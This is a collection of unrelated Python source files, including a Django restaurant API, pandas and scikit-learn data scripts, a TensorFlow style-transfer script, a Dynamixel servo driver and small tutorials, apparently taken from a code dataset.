
    Returns:
        The requested item, or None when the list is too short.
    """
    # Map the requested kind to its position in the list.
    index = {'command': 0, 'argument': 1}[type]
    items = args if args is not None else []
    if len(items) > index:
        return items[index]
    return None
|
991,410 | 2b9d4ef4683908f662c5ea1e05a8e7261df1991a | from rest_framework import viewsets
from .models import Restaurant
from .serializers import RestaurantSerializer
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.decorators import action
class RestaurantViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for restaurants.

    Listing and retrieval are public; all other actions require an
    authenticated user, and creation additionally requires a restaurant
    account (request.user.is_restaurant).
    """
    queryset = Restaurant.objects.all().prefetch_related(
        'categories', 'categories__foods')
    serializer_class = RestaurantSerializer

    def list(self, request):
        """List restaurants, optionally filtered by ?search=<substring>."""
        if request.query_params == {}:
            queryset = Restaurant.objects.all()
        else:
            # Bug fix: .get() avoids a 500 (KeyError) when query params are
            # present but 'search' is not among them; '' matches everything.
            query = request.query_params.get('search', '')
            queryset = Restaurant.objects.filter(name__icontains=query)
        serializer = RestaurantSerializer(
            queryset, many=True, fields=('id', 'name', 'address',))
        return Response(serializer.data)

    def create(self, request):
        """Create a restaurant owned by the requesting restaurant user."""
        if not request.user.is_restaurant:
            return Response({'message': 'unauthorized'}, 401)
        serializer = RestaurantSerializer(
            data=request.data, fields=('id', 'name', 'address',))
        if not serializer.is_valid():
            # Bug fix: return 400 so clients can tell a validation failure
            # from a success (the original sent errors with HTTP 200).
            return Response(serializer.errors, 400)
        serializer.save(user=request.user)
        return Response(serializer.data)

    def get_permissions(self):
        """Public read access; authentication required for everything else."""
        if self.action in ('list', 'retrieve'):
            permission_classes = [AllowAny]
        else:
            permission_classes = [IsAuthenticated]
        return [permission() for permission in permission_classes]
|
991,411 | 8268108044f9b1abe5153e912348d139601fa44d | from preprocess.load_data.data_loader import load_hotel_reserve
customer_tb, hotel_tb, reserve_tb = load_hotel_reserve()
# Book content starts from the line below
# Count reservations per hotel (see the example in
# "3-1 computing counts and distinct counts")
rsv_cnt_tb = reserve_tb.groupby('hotel_id').size().reset_index()
rsv_cnt_tb.columns = ['hotel_id', 'rsv_cnt']
# Rank hotels by reservation count
# ascending=False ranks in descending order
# method='min' gives tied values the smallest attainable rank
rsv_cnt_tb['rsv_cnt_rank'] = rsv_cnt_tb['rsv_cnt'] \
    .rank(ascending=False, method='min')
# Drop the rsv_cnt column, which is no longer needed
rsv_cnt_tb.drop('rsv_cnt', axis=1, inplace=True)
|
991,412 | 82619ab5ee680d769095c69db3915a0d20da96c5 |
MOD = 10 ** 9 + 7
import math

__author__ = 'Danyang'


class Solution(object):
    def solve(self, cipher):
        """Count multisets of size N over M symbols: C(N+M-1, M-1) mod 1e9+7.

        cipher is the pair (N, M). The factorial divisions are exact, so
        integer arithmetic is correct here.
        """
        N, M = cipher
        # Bug fix: use floor division — on Python 3 true division `/` turns
        # the exact integer into a lossy float before the % MOD step.
        return math.factorial(N + M - 1) // math.factorial(N) // math.factorial(M - 1) % MOD
# NOTE: Python 2 script — xrange, list-returning map() and the
# print-statement with a trailing comma are all Python 2 constructs.
if __name__ == "__main__":
    import sys
    f = open("1.in", "r")
    # First line of the input file holds the number of test cases.
    testcases = int(f.readline().strip())
    for t in xrange(testcases):
        # Each subsequent line holds N and M separated by a space.
        cipher = map(int, f.readline().strip().split(' '))
        s = "%s\n" % (Solution().solve(cipher))
        print s,
|
991,413 | bbffff9dbe29982994c8edd101db86dc44786d6c | """
This module is one of the two entrypoints with train.py
It is used to make predictions using our model.
"""
import pickle
import logging
from typing import Union
from warnings import simplefilter
import pandas as pd
from pandas.core.common import SettingWithCopyWarning
import src.config.base as base
import src.config.column_names as col
from src.domain.cleaning import correct_wrong_entries, impute_missing_eco_data
from src.infrastructure.build_dataset import DataBuilderFactory, DataMerger
# Ignorer les warnings pour améliorer la lisibilité
simplefilter(action="ignore", category=FutureWarning)
simplefilter(action="ignore", category=SettingWithCopyWarning)
def load_pipeline():
    """Load and return the fitted model pipeline from its pickle file.

    Raises FileNotFoundError (after logging) when the model file is absent.
    """
    try:
        logging.info("Loading the fitted pipeline...")
        with open(base.SAVED_MODEL_PATH, "rb") as model_file:
            fitted_pipeline = pickle.load(model_file)
        logging.info("Loading completed successfully...")
    except FileNotFoundError:
        logging.error("Model file has not been found.")
        raise
    return fitted_pipeline
def main(prediction_data_path=base.PREDICT_CLIENT_DATA_PATH, run_type: str = "normal"):
    """Run the prediction pipeline end to end.

    Args:
        prediction_data_path: path to the client data to predict on.
        run_type: "normal" writes the predictions CSV to disk; "api"
            returns a human-readable label for the first prediction.
    """
    # Builds datasets.
    logging.info("Building datasets...")
    client_builder = DataBuilderFactory(
        prediction_data_path, base.config_client_data, base.ALL_CLIENT_DATA_TRANSLATION
    )
    client_data = client_builder.preprocess_data().data
    eco_builder = DataBuilderFactory(base.PREDICT_ECO_DATA_PATH, base.config_eco_data)
    eco_data = eco_builder.preprocess_data().data
    logging.info("Preprocessing...")
    # Imputes NaN from the eco dataset.
    # This step is done outside the pipeline to avoid duplication of NaN while merging.
    eco_data = impute_missing_eco_data(eco_data)
    # Fixes erroneous entries in client dataset.
    client_data = correct_wrong_entries(
        client_data, base.config_client_data.get("wrong_entries")
    )
    # Merges client and eco datasets.
    logging.info("Merging client and eco datasets...")
    merged = DataMerger(client_data, eco_data, col.MERGER_FIELD)
    merged.merge_datasets()
    X_pred = merged.joined_datasets
    if col.TARGET in X_pred.columns:
        X_pred.drop(col.TARGET, axis=1, inplace=True)
    # Loads pipeline.
    pipeline = load_pipeline()
    # Bug fix: DataFrame.dropna returns a new frame; the original discarded
    # the result, so rows with missing values were still sent to predict().
    X_pred = X_pred.dropna(axis=0)
    y_pred = pipeline.predict(X_pred)
    # Writes predictions.
    if run_type == "normal":
        pd.Series(y_pred).to_csv(base.PREDICTIONS_FILE_PATH)
    elif run_type == "api":
        if y_pred[0] == 0:
            return "N'a pas souscrit"
        elif y_pred[0] == 1:
            return "A souscrit"
# Script entry point: run a full prediction pass with default settings.
if __name__ == "__main__":
    main()
|
991,414 | d643a01e1f285780f20512c7809f0f316c1692bf | from typing import Iterable, Tuple, List, Callable, Union
from Day02.task import Mode, IntMachine, CustomList, work_code
from Day17.task import my_machine
from Day19 import INPUT
from helper import Iterator, Point, get_all_combs
from main import custom_print as custom_printer
def get_affected_pos(inp: Union[List[int], str, CustomList], machine: IntMachine, test_pos: Iterable[Point]) -> List[
    Point]:
    """Run the Intcode program once per probe point and collect every point
    the machine reports as inside the tractor beam (output value 1)."""
    deploy_machine = machine.copy()
    deploy_machine.reset_machine()
    ret: List[Tuple[int, int]] = []
    it = Iterator(0)
    # Mutable current probe point; both I/O callbacks below close over it.
    point = Point(0, 0)
    def custom_write(read_code: List[int], loc: int, modes: Callable[[int], Mode]) -> Tuple[bool, int]:
        # Machine output opcode: 1 means the current point is affected.
        value = modes(1).read(read_code, loc + 1)
        if value == 1:
            ret.append(point.copy())
        return False, loc + 2
    def custom_read(read_code: List[int], loc: int, modes: Callable[[int], Mode]) -> Tuple[bool, int]:
        # Machine input opcode: feed the point's components one at a time.
        modes(1).write(read_code, loc + 1, point[it.get() % len(point)])
        it.increase()
        return False, loc + 2
    deploy_machine.register_action(3, custom_read)
    deploy_machine.register_action(4, custom_write)
    for pos in test_pos:
        point.set(pos)
        # Each probe needs a fresh machine state before re-running the code.
        deploy_machine.reset_machine()
        work_code(inp, deploy_machine)
    return ret
def main():
    """Scan the 50x50 area and print how many points the beam affects."""
    candidates = (Point(pair[0], pair[1])
                  for pair in get_all_combs(0, 49, length=2, just_once=False))
    aff_points = get_affected_pos(INPUT, my_machine, candidates)
    custom_printer("A1")
    custom_printer(f"Affected points {len(aff_points)}: {', '.join(str(x) for x in aff_points)}")
|
991,415 | 6176bddc84b89b27a561db0c83faa9280d9f890a | import pandas as pd
from sqlalchemy import create_engine
from util.scrawl import *
import os
def repay():
    """Crawl the photo-gallery page of every listing in the `infodata` table
    and append non-VR picture URLs to test.txt as CSV rows.

    NOTE(review): database credentials are hard-coded in the connection URL;
    move them to configuration/environment before sharing this code.
    """
    engine = create_engine('mysql+pymysql://root:gkd123,.@47.101.44.55:3306/Houseprice?charset=utf8', encoding='utf-8')
    df = pd.read_sql('select * from infodata', engine)
    cc = 0
    for index, row in df.iterrows():
        cc += 1
        # Resume point: rows before 14668 were presumably handled by a prior run.
        if cc < 14668:
            continue
        print(cc)
        # The gallery page lives at .../xiangce instead of the detail page .../xiangqing.
        url = row['url'].replace('xiangqing', 'xiangce')
        html = getHTML(url)
        count = 0
        while True:
            count += 1
            try:
                # Walk gallery sections by index until the XPath stops matching.
                type = html.xpath('/html/body/div[2]/div[1]/div/div[{0}]/h4/a/text()'.format(count))[0].split('(')[0]
                pics = html.xpath('/html/body/div[2]/div[1]/div/div[{0}]/ul/li/a/img/@src'.format(count))
            except:
                # Bare except doubles as the loop exit: [0] raises IndexError
                # once the section index runs past the last gallery block.
                break
            if 'VR' not in type:
                with open('test.txt', 'a+', encoding='utf-8') as f:
                    for pic in pics:
                        f.write(str(cc) + ',' + row['url'] + ',' + type + ',' + pic + '\n')
            else:
                # Skip VR panoramas, keep plain photos only.
                continue
def clean():
    """Convert crawler output in test.txt into INSERT statements in tosql.sql.

    Each input line is "num,url,type,pic_url"; the picture column is reduced
    to the CDN path (host prefix and '!'-style suffix stripped). Prints a
    running count of converted rows.
    """
    count = 0
    with open('test.txt', 'r', encoding='utf-8') as f:
        data = f.read().split('\n')
    for item in data:
        parts = item.split(',')
        # BUG FIX: the trailing empty line (and any malformed row) used to
        # raise IndexError on parts[1]; skip rows lacking the expected fields.
        if len(parts) < 4:
            continue
        pic = item.split('https://ke-image.ljcdn.com/')[-1].split('!')[0]
        num = parts[0]
        url = parts[1]
        type_ = parts[2]
        # NOTE(review): values are interpolated into SQL without escaping --
        # acceptable for trusted crawler output, unsafe for anything else.
        with open(os.getcwd() + '/tosql.sql', 'a+', encoding='utf-8') as t:
            t.write("INSERT INTO `loupan_pic` VALUES ('{0}','{1}','{2}','{3}');".format(num, url, type_, pic))
            t.write('\n')
        count += 1
        print(count)
if __name__ == '__main__':
# repay()
clean()
|
991,416 | 5c738e0743d4960ebbefb62c4b405691136ed54c | #To add elements to a set using- add()
#Initially colors is an empty set
colors = set()
print(colors) #set()
colors.add('blue')
colors.add('red')
colors.add('white')
print(colors) #{'blue', 'red', 'white'}
#Sets are designed in such a way that you cannot add mutables as an element in sets
newColors = ['green', 'yellow', 'purple']
#Since, list is mutable type, you cannot add whole list as an element to a set
"""
colors.add(newColors)
TypeError: unhashable type: 'list'
"""
#So, you cannot add mutables like list, dictionary as an element in set
#But we can add immutables like string, tuples, numbers, floats as an element in set
colors.add(('green', 'yellow', 'cyan'))
print(colors) #{'blue', 'red', 'white', ('green', 'yellow', 'cyan')}
#4th element in colors is a tuple
#clear() - remove all elements from the set
colors.clear()
print(colors) #set()
colors = {'red', 'blue', 'green', 'black', 'pink'}
#pop() - removes & returns an arbitary element from set, if set if empty it raises KeyError
print(colors.pop()) #pink
print(colors.pop()) #blue
colors = set()
"""
print(colors.pop())
KeyError: 'pop from an empty set'
"""
#discard(e) - element e will be removed from set, if e is not present in set, nothing will be done
colors = {'red', 'blue', 'green', 'black', 'pink'}
colors.discard('blue')
colors.discard('white')
colors.discard('pink')
print(colors) #{'black', 'green', 'red'}
#remove(e) - works just like discard, but if e element is not present in set, it raises KeyError
colors = {'black', 'green', 'red'}
colors.remove('black')
print(colors) #{'red', 'green'}
"""
colors.remove('defi')
KeyError: 'defi'
"""
|
991,417 | 90c3d457c3a902d7dd2077b46f17985f156a67bc | import vgg
import numpy as np
import tensorflow as tf
import cv2
import os
import wrapper
from functools import reduce
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def gram_matrix(matrix):
    """Return the Gram matrix of *matrix*, normalised by its element count."""
    gram = matrix.T @ matrix
    return gram / matrix.size
content_layers = ('relu3_2','relu4_2', 'relu5_2')
style_layers = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')
weight_path = "imagenet-vgg-verydeep-19.mat"
content_instance_path = 'content.jpg'
style_instance_path = 'style.jpg'
style_weight = 100000000000
total_variance_weight = 10000
vgg_weight,vgg_mean_pixel = vgg.load_net(weight_path)
content_instance = cv2.imread(content_instance_path)
content_shape = (1,) + content_instance.shape
content = tf.placeholder(shape=content_shape,dtype=tf.float32,name='content')
style_instance = cv2.imread(style_instance_path)
style_shape = (1,) + style_instance.shape
style = tf.placeholder(shape=style_shape,dtype=tf.float32,name='style')
content_feature = {}
style_feature = {}
@wrapper.run_time_record("Calculated content feature successfully!")
def calculate_content_feature():
    """Populate the module-level *content_feature* dict with the VGG
    activations of the content image, one entry per layer in content_layers.

    NOTE(review): pixels are scaled by /256 rather than the usual /255 --
    presumably intentional, verify against the style path which does the same.
    """
    with tf.Session():
        VGG_net = vgg.net_preloaded(weights=vgg_weight, input_image=content, pooling='max')
        content_preprocess = np.array(content_instance) / 256
        for layer in content_layers:
            content_feature[layer] = VGG_net[layer].eval(feed_dict={content:np.reshape(content_preprocess,content_shape)})
@wrapper.run_time_record("Calculated style feature successfully!")
def calculate_style_feature():
    """Populate the module-level *style_feature* dict with the Gram matrices
    of the style image's VGG activations, one per layer in style_layers."""
    with tf.Session():
        VGG_net = vgg.net_preloaded(weights=vgg_weight,input_image=style,pooling='max')
        style_preprocess = np.array(style_instance) / 256
        for layer in style_layers:
            feature = VGG_net[layer].eval(feed_dict={style:np.reshape(style_preprocess,style_shape)})
            # Flatten to (H*W, C) before taking the Gram matrix.
            style_feature[layer] = gram_matrix(np.reshape(feature,[feature.shape[1]*feature.shape[2],feature.shape[3]]))
def generate_image(start_rate,decay_steps,end_step,export_period,beta1,beta2,epsilon):
    """Optimise an image to minimise content + style + total-variation loss.

    Args:
        start_rate: initial learning rate (exponentially decayed, rate 0.98).
        decay_steps: steps between learning-rate decays.
        end_step: total number of Adam optimisation steps.
        export_period: write a snapshot JPEG every this many steps.
        beta1, beta2, epsilon: Adam optimiser hyper-parameters.

    Snapshots are written as step_<i>.jpg in the working directory.
    """
    with tf.Graph().as_default() as g:
        image_shape = content_shape
        # The generated image is itself the trainable variable.
        image = tf.Variable(tf.random_normal(mean=0, stddev=0.2, shape=image_shape), name='image',dtype=tf.float32)
        VGG_net = vgg.net_preloaded(weights=vgg_weight,input_image=image,pooling='max')
        content_loss = 0
        style_loss = 0
        # Uniform per-layer weights for the content (alpha) and style (beta) terms.
        alpha = np.full(len(content_feature),1/len(content_feature))
        beta = np.full(fill_value=1/len(style_feature),shape=len(style_feature))
        for i,layer in enumerate(content_layers):
            content_loss += alpha[i] * tf.losses.mean_squared_error(VGG_net[layer],content_feature[layer])
        for i,layer in enumerate(style_layers):
            current_layer = VGG_net[layer]
            # Gram matrix of the current activations, normalised by size
            # (mirrors gram_matrix used for the precomputed style targets).
            feature = tf.reshape(current_layer,[current_layer.shape[1]*current_layer.shape[2],current_layer.shape[3]])
            feature = tf.matmul(tf.transpose(feature),feature)
            feature = feature / reduce(lambda x,y:x*y,current_layer.shape.as_list())
            style_loss += style_weight * beta[i] * tf.losses.mean_squared_error(feature,style_feature[layer])
        # Total-variation regulariser: penalises differences between adjacent pixels.
        total_variance_loss = total_variance_weight * (tf.nn.l2_loss(image[:,1:,:,:]-image[:,:image_shape[1]-1,:,:]) + tf.nn.l2_loss(image[:,:,1:,:]-image[:,:,:image_shape[2]-1,:]))
        loss = content_loss + style_loss + total_variance_loss
        global_step = tf.Variable(0)
        learning_rate = tf.train.exponential_decay(start_rate, global_step, decay_steps=decay_steps, decay_rate=0.98,staircase=True)
        train_step = tf.train.AdamOptimizer(learning_rate=learning_rate,beta1=beta1,beta2=beta2,epsilon=epsilon).minimize(loss,global_step=global_step)
        with tf.Session(graph=g) as session:
            session.run(tf.global_variables_initializer())
            # Start from the content image rather than the random initialisation.
            session.run(image.assign(np.reshape(content_instance,content_shape)/256))
            for i in range(end_step+1):
                if not i % export_period:
                    # De-normalise, clamp to [0, 255] and export a snapshot.
                    image_instance = np.array(image.eval()*256)
                    image_instance = np.reshape(np.array(np.clip(np.round(image_instance,0),0,255),dtype=int),newshape=[content_shape[1],content_shape[2],content_shape[3]])
                    cv2.imwrite("step_"+str(i)+".jpg",image_instance,[int(cv2.IMWRITE_JPEG_QUALITY), 100])
                # Wrap the training step so its timing/loss line is logged each step.
                wrapper.run_time_record("step " + str(i) + ": loss " + str(loss.eval())
                                        + " |content loss " + str(content_loss.eval())
                                        + " |style loss " + str(style_loss.eval())
                                        + " |tv loss " + str(total_variance_loss.eval())
                                        + " |rate " + str(learning_rate.eval()))(train_step.run)(session=session)
calculate_content_feature()
calculate_style_feature()
generate_image(start_rate=0.007,decay_steps=1000,end_step=3000,export_period=2,beta1=0.9,beta2=0.999,epsilon=10e-8)
|
991,418 | af039bcd7cffec5e8ab7b598bd7a01ab52338848 | print("hello world")
# comment : 메모 적어두는 곳
# variables : 변수 = "변하는 수"
identity = 'pencil'
print('I want to write it by',identity,'.')
# 변수의 종류는 크게 두 가지 있음: 숫자와 문자열 변수로 나뉨. 이걸 변수의 data type이라고 함. 정수와 실수, 문자열 data type이라고 함. int, double (or float), string
a = 5
b = 1.1
c = 'hello'
# 숫자 변수는 사칙연산이 가능, 문자 변수는 불가능
a = a+1
b = b+1.9
# c = c+1
# print(a)
# print(b)
# print(c)
a = (a-3)*3/9
print(a)
d = 'world'
print(c,d)
# 데이터타입별 초기화 방법
a = 0
b = 0.0
c = ''
# 제곱, 나머지, 몫
a = 2
a = a ** 5
b = 5
b = b % a
c = 10
c = c // 2
print(a)
print(b)
print(c)
a = '1'
b = '1'
a = a + b
print(a)
# 문자열 3종류
string1 = 'hello kim'
string2 = "hello 'kim'"
string3 = """ "hello" 'kim'
!
"""
print(string1)
print(string2)
print(string3)
# print의 출력형식(format) 3가지
number = 20
name = 'Mr. Kim'
base = 'Welcome, {}. Your room # is {}'
print('Welcome,',name,'. Your room # is',number)
print(base.format(name,number))
print('Welcome, {}. Your room # is {}'.format(name,number))
# casting : 데이터타입을 바꾸는 것
# int : 정수, string : 문자열, float : 실수
a = 1.1
b = 1
c = a + b
c = int(c)
print(c)
c = 2
c = float(c)
print(c)
# datatype
"""
int(integer) 정수 a = 0
float 실수 a = 0.0
string 문자열 a = ''
list 리스트 a = []
dict(dictionary) 딕셔너리 a = {}
bool(boolean) 0,[],Noneは(false)になります。その以外は全部(true)になります。
"""
a = bool(0) #False
b = bool(3.3) #True
c = bool([]) #False
d = bool(None) #False
print(a, b, c, d)
# datatype print
list = [1, 2, 3]
dict = {"pen": 100, "pencilcase": 300}
tuple = (1, 2, 3)
number = 10
real_number = 3.141592
print(type(list))
print(type(dict))
print(type(tuple))
print(type(number))
print(type(real_number))
|
991,419 | 38d8f397a82b278fd1d22d6a80f26c3fe7e8b0bf | from dynamixel_sdk.port_handler import *
from dynamixel_sdk.packet_handler import *
from colors import *
class ModelFlag:
    """Descriptor for one Dynamixel control-table entry."""

    def __init__(self, address, data_length):
        # Register address and its width in bytes.
        self.data_length = data_length
        self.address = address
class Dynamixel:
    """Driver for a single Dynamixel servo on a shared serial port (Python 2).

    Supports the control tables of model 311 (MX series) and model 12
    (AX series); unknown models fall back to the MX table.
    """

    # Protocol versions supported by the SDK packet handler.
    protocol_versions = [1.0, 2.0]
    # Control tables: model number -> flag name -> ModelFlag(address, bytes).
    models = {
        # MX series
        311: {
            "Return_Delay_Time": ModelFlag(9, 1),
            "Drive_Mode": ModelFlag(10, 1),
            "Operating_Mode": ModelFlag(11, 1),
            "Shadow_ID": ModelFlag(12, 1),
            "Velocity_Limit": ModelFlag(44, 4),
            "Max_Position": ModelFlag(48, 4),
            "Min_Position": ModelFlag(52, 4),
            "Shutdown": ModelFlag(63, 1),
            "Torque_Enabled": ModelFlag(64, 1),
            "Profile_Acceleration": ModelFlag(108, 4),
            "Profile_Velocity": ModelFlag(112, 4),
            "Goal_Position": ModelFlag(116, 4),
            "Moving": ModelFlag(122, 1),
            "Present_Current": ModelFlag(126, 2),
            "Present_Velocity": ModelFlag(128, 4),
            "Present_Position": ModelFlag(132, 4),
            "Velocity_Trajectory": ModelFlag(136, 4)
        },
        # AX series
        12: {
            "Return_Delay_Time": ModelFlag(5, 1),
            "Min_Position": ModelFlag(6, 2),
            "Max_Position": ModelFlag(8, 2),
            "Max_Torque": ModelFlag(14, 2),
            "Shutdown": ModelFlag(18, 1),
            "Torque_Enabled": ModelFlag(24, 1),
            "Goal_Position": ModelFlag(30, 2),
            "Torque_Limit": ModelFlag(34, 2),
            "Present_Position": ModelFlag(36, 2),
            "Present_Velocity": ModelFlag(38, 2),
            "Present_Load": ModelFlag(40, 2),
            "Moving": ModelFlag(46, 1),
        }
    }
    # Angle <-> raw-position conversion ranges per model.
    angle_limits = {
        311: {
            "Max_Angle": 360.0,
            "Max_Position": 4095,
            "Min_Angle": 0.0,
            "Min_Position": 0
        },
        12: {
            "Max_Angle": 300.0,
            "Max_Position": 1023,
            "Min_Angle": 0.0,
            "Min_Position": 0
        }
    }

    def __init__(self, portHandler, id, protocol):
        """Ping the servo and select the control table matching its model."""
        self.portHandler = portHandler
        self.id = id
        if protocol in Dynamixel.protocol_versions:
            self.protocol = protocol
        else:
            print "Invalid protocol, using default"
            self.protocol = Dynamixel.protocol_versions[-1]
        self.packetHandler = PacketHandler(self.protocol)
        # Ping dynamixel
        dxl_model_number, dxl_comm_result, dxl_error = self.packetHandler.ping(
            self.portHandler, self.id)
        if dxl_comm_result != COMM_SUCCESS:
            print "Error: %s" % self.packetHandler.getTxRxResult(
                dxl_comm_result)
        elif dxl_error != 0:
            print "Error: %s" % self.packetHandler.getRxPacketError(dxl_error)
        else:
            model = "MX-64" if dxl_model_number == 311 else "AX-12"
            if model == "MX-64":
                printC(MX64)
            elif model == "AX-12":
                printC(AX12)
            print "-> [ID:%03d]" % (self.id)
        # Fall back to the MX (311) tables for unconfigured models.
        self.model = None
        if dxl_model_number not in Dynamixel.models:
            print 'Error: Model not configured. Using default model.'
            self.model = Dynamixel.models[311]
        else:
            self.model = Dynamixel.models[dxl_model_number]
        self.limits = None
        if dxl_model_number not in Dynamixel.angle_limits:
            print 'Error: Model not configured. Using default model.'
            self.limits = Dynamixel.angle_limits[311]
        else:
            self.limits = Dynamixel.angle_limits[dxl_model_number]
        # Cached goal and soft position limits (refreshed by updateMaxPositions).
        self.goal_pos = 0
        self.max_pos = self.limits["Max_Position"]
        self.min_pos = self.limits["Min_Position"]

    def updateMaxPositions(self):
        """Refresh the cached min/max positions from the servo's registers."""
        print("ID %i -> " % self.id),
        pos, result = self.read("Max_Position")
        if result:
            self.max_pos = pos
        else:
            printC(WARNING, "Could not read max position, using default one")
        pos, result = self.read("Min_Position")
        if result:
            self.min_pos = pos
        else:
            printC(WARNING, "Error: Could not read min position, using default one")
        printC(RANGE, "%s %s" % (self.min_pos, self.max_pos))

    def write(self, flag, value):
        """Write *value* to the control-table entry *flag*.

        Returns True on success; False for unknown flags or comm/packet errors.
        """
        if flag not in self.model:
            printC(ERROR, "Flag not specified. Options are:")
            for key in self.model:
                print "\t"+key
            return False
        port = self.portHandler
        id = self.id
        address = self.model[flag].address
        data_length = self.model[flag].data_length
        dxl_comm_result, dxl_error = (None, None)
        # Dispatch on the entry's byte width.
        if data_length == 1:
            dxl_comm_result, dxl_error = self.packetHandler.write1ByteTxRx(
                port, id, address, value)
        elif data_length == 2:
            dxl_comm_result, dxl_error = self.packetHandler.write2ByteTxRx(
                port, id, address, value)
        elif data_length == 4:
            dxl_comm_result, dxl_error = self.packetHandler.write4ByteTxRx(
                port, id, address, value)
        else:
            printC(ERROR, "Fatal: Undefined data length")
            quit()
        if dxl_comm_result != COMM_SUCCESS:
            printC(WARNING, self.packetHandler.getTxRxResult(dxl_comm_result))
            return False
        elif dxl_error != 0:
            printC(WARNING, self.packetHandler.getRxPacketError(dxl_error))
            return False
        return True

    def read(self, flag):
        """Read the control-table entry *flag*.

        Returns (value, True) on success, (0, False) otherwise.
        """
        if flag not in self.model:
            print "Error: Flag not specified. Options are:"
            for key in self.model:
                print "\t"+key
            return 0, False
        port = self.portHandler
        id = self.id
        address = self.model[flag].address
        data_length = self.model[flag].data_length
        result, dxl_comm_result, dxl_error = (0, None, None)
        # Dispatch on the entry's byte width.
        if data_length == 1:
            (result, dxl_comm_result, dxl_error) = self.packetHandler.read1ByteTxRx(
                port, id, address)
        elif data_length == 2:
            (result, dxl_comm_result, dxl_error) = self.packetHandler.read2ByteTxRx(
                port, id, address)
        elif data_length == 4:
            (result, dxl_comm_result, dxl_error) = self.packetHandler.read4ByteTxRx(
                port, id, address)
        else:
            print "Fatal: Unsupported data length"
            quit()
        if dxl_comm_result != COMM_SUCCESS:
            printC(WARNING, "%s" % self.packetHandler.getTxRxResult(
                dxl_comm_result))
            return 0, False
        elif dxl_error != 0:
            printC(WARNING, "%s" % self.packetHandler.getRxPacketError(
                dxl_error))
            return 0, False
        return result, True

    # Receives the position in degrees and converts to actual value
    def writeAngle(self, angle):
        """Command the servo to *angle* (degrees), clamped to the soft limits.

        Returns the result of the underlying write; False if out of range.
        """
        max_angle = self.limits['Max_Angle']
        min_angle = self.limits['Min_Angle']
        max_position = self.limits['Max_Position']
        min_position = self.limits['Min_Position']
        if angle < min_angle or angle > max_angle:
            print "Error: Angle out of range"
            return False
        # Convert angle to position
        ratio = angle/(abs(max_angle - min_angle))
        position = int(round(ratio*(abs(max_position-min_position))))
        # Cap position to maximum position set on the dynamixel
        if position > self.max_pos:
            position = self.max_pos
        elif position < self.min_pos:
            position = self.min_pos
        result = self.write("Goal_Position", position)
        self.goal_pos = position
        return result

    def readAngle(self):
        """Return (angle_in_degrees, ok) derived from the present position."""
        position, result = self.read("Present_Position")
        if not result:
            return 0.0, False
        max_angle = self.limits['Max_Angle']
        min_angle = self.limits['Min_Angle']
        max_position = self.limits['Max_Position']
        min_position = self.limits['Min_Position']
        # The 1.0* factor forces float division under Python 2.
        ratio = (1.0*position)/abs(max_position-min_position)
        angle = ratio * max_angle
        return angle, True

    def readLoad(self):
        """Return (load, ok).

        Protocol 2 reads the signed current register and converts it; the
        conversion constants presumably come from the MX-64 datasheet --
        verify. Protocol 1 reads the load register directly.
        """
        if self.protocol == 2:
            current, result = self.read("Present_Current")
            # Two's-complement sign fix for the 16-bit current register.
            if (current > 32768):
                current = current - 65536
            load = (1.1489*current - 0.172340426)*0.001
            if not result:
                return 0.0, False
        elif self.protocol == 1:
            load, result = self.read("Present_Load")
            if not result:
                return 0.0, False
        return load, True

    def readVelocity(self):
        """Return (velocity, ok) from the present-velocity register."""
        velocity, result = self.read("Present_Velocity")
        if not result:
            return 0.0, False
        return velocity, True

    def reachedGoal(self):
        """True when present position is within 1 tick of the last goal.

        Also returns True when the position cannot be read, so callers do
        not block forever on a comm failure.
        """
        position, result = self.read("Present_Position")
        if not result:
            return True
        return abs(position-self.goal_pos) <= 1

    def isMoving(self):
        """Return the raw (value, ok) pair of the Moving flag."""
        return self.read("Moving")
|
991,420 | 98b75bc712ef8c65d8a67310e4083d7f4b502d1e | #
# Copyright (C) University College London, 2007-2012, all rights reserved.
#
# This file is part of HemeLB and is CONFIDENTIAL. You may not work
# with, install, use, duplicate, modify, redistribute or share this
# file, or any part thereof, other than as allowed by any agreement
# specifically made by you with University College London.
#
class Link(object):
    """A lattice link, tagged with the kind of boundary it crosses."""

    # Enumeration of boundary types a link may cross.
    no_boundary = 0
    wall = 1
    inlet = 2
    outlet = 3

    def __init__(self, link_type, wall_distance=0, iolet_index=0):
        """Store the boundary type, wall distance and inlet/outlet index.

        wall_distance is expressed as a fraction of the lattice vector;
        iolet_index identifies which inlet/outlet the link belongs to.
        """
        self.iolet_index = iolet_index
        self.wall_distance = wall_distance
        self.link_type = link_type
991,421 | 8de4db3f673ee5d3a17bae14c9cac1d4e7810c76 | import numpy as np
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
import six
class MLModelPipeline:
    """Bundle preprocessing, feature selection and an estimator into a
    grid-searchable scikit-learn pipeline.

    Parameters registered through set_params_* are accumulated in
    self.params, keyed by pipeline step for GridSearchCV.
    """

    def __init__(self, process_features, feature_selection, clf):
        self.process_features = process_features
        self.feature_selection = feature_selection
        self.clf = clf
        # Accumulated grid-search parameter grid.
        self.params = {}

    def define_pipeline(self):
        """Assemble the three configured steps into a Pipeline."""
        pipe = Pipeline([('process_features', self.process_features),
                         ('feature_selection', self.feature_selection),
                         ('estimator', self.clf)])
        return pipe

    def set_params_feature_selection(self, **params_feature_selection):
        """Register grid-search parameters for the feature-selection step.

        Returns self to allow chaining.
        """
        if not params_feature_selection:
            return self
        # IMPROVEMENT: dict.items() replaces six.iteritems -- identical
        # behaviour on Python 3, one less third-party dependency.
        for key, value in params_feature_selection.items():
            self.params['feature_selection__' + key] = value
        return self

    def set_params_estimator(self, **params_estimator):
        """Register grid-search parameters for the estimator step.

        Returns self to allow chaining.
        """
        if not params_estimator:
            return self
        for key, value in params_estimator.items():
            self.params['estimator__' + key] = value
        return self

    def get_best_estimator(self, score, X_train, y_train):
        """Grid-search the registered parameters and return the fitted search."""
        pipe = self.define_pipeline()
        grid = GridSearchCV(estimator=pipe, param_grid=self.params, scoring=score)
        print(self.params)
        grid.fit(X_train, y_train)
        return grid
|
991,422 | 528536c9c99a40a08783ef5f68b2a99a92da3aad | from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import sys
import numpy as np
import parsebmp as pb
# Define method
def weight_variable(shape, name):
    """Create a trainable weight tensor drawn from a truncated normal (stddev 0.1)."""
